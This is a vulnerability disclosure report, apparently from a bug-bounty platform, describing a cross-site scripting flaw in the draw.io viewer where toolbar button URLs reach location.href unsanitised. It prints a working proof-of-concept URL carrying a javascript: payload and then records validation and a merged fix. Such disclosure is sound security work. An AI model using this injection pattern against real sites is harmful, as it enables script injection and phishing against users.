XSS at https://viewer.diagrams.net/ in jgraph/drawio

Valid

Reported on

Sep 5th 2022


Description

The application uses a parameter to specify a url on the refresh and the back button, assigning it to location.href without sanitizing

Proof of Concept

Go to:

https://viewer.diagrams.net/index.html?tags=%7B%7D&highlight=0000ff&&layers=1&nav=1&toolbar=1&toolbar-config=%7B%22backBtn%22:%7B%22url%22:%22javascript:alert(document.domain)%22%7D,%22refreshBtn%22:%7B%22url%22:%22javascript:alert(document.domain)%22%7D%7D&title=xss.drawio#RdZNdb9sgFIZ%2FjaXtopUDTdZdxkmbatI2TVnVa2qoTQscD%2BPa6a%2FfIYA%2F1lWyZHjOy%2FnikNGdHg6WNfV34EJlJOdDRvcZIasrQjL%2F5fwUCF1HUFnJo2gCR%2FkmIswj7SQX7ULoAJSTzRKWYIwo3YIxa6Ffyp5ALaM2rBLvwLFk6j19kNzVgV6TLxO%2FE7KqU%2BTV5muwaJbEsZK2Zhz6GaI3Gd1ZABdWetgJ5ZuX%2BhLO3X5gHROzwrj%2FHLhvhf35%2BOx7QnLFHvFezqKMbBTqiycw3tK6Uyx186eDZLhozxexRcE6b%2FAyi8mOq8r%2Ff4vBJWcYNfgLppCakuYlxHxmr6wtrWzQuF1sfLr%2BW%2BcMW27dJw5lp7GiSw6aSfM5uEpFr39ct923fP9r%2F3ab3w2H432nL1ZjM8cmTVUR59OkRe20b8AKl62z8CJ2oMAiMWCEr1oq9Q9iSlYGtyWmI5AXr5igxNHYRoOWnPswRV9LJ44NK33MHh8CMgud4cLnnY8d8Q7E8OH9zQs5CNDC2RNK4gFK4yDFl0Q2cd9Pc5lQPRvJdIzFl1CNnqdhwUXsXdrOxiehaVTP8tmDpzd%2FAQ%3D%3D

Click on the refresh or the back icon on toolbar

Impact

XSS, phishing

We are processing your report and will contact the jgraph/drawio team within 24 hours. 25 days ago
David Benson validated this vulnerability 25 days ago
Joao Vitor Maia has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
David Benson confirmed that a fix has been merged on b5dfeb 24 days ago
The fix bounty has been dropped
EditorUi.js#L2555 has been validated
EditorUi.js#L2819 has been validated
to join this conversation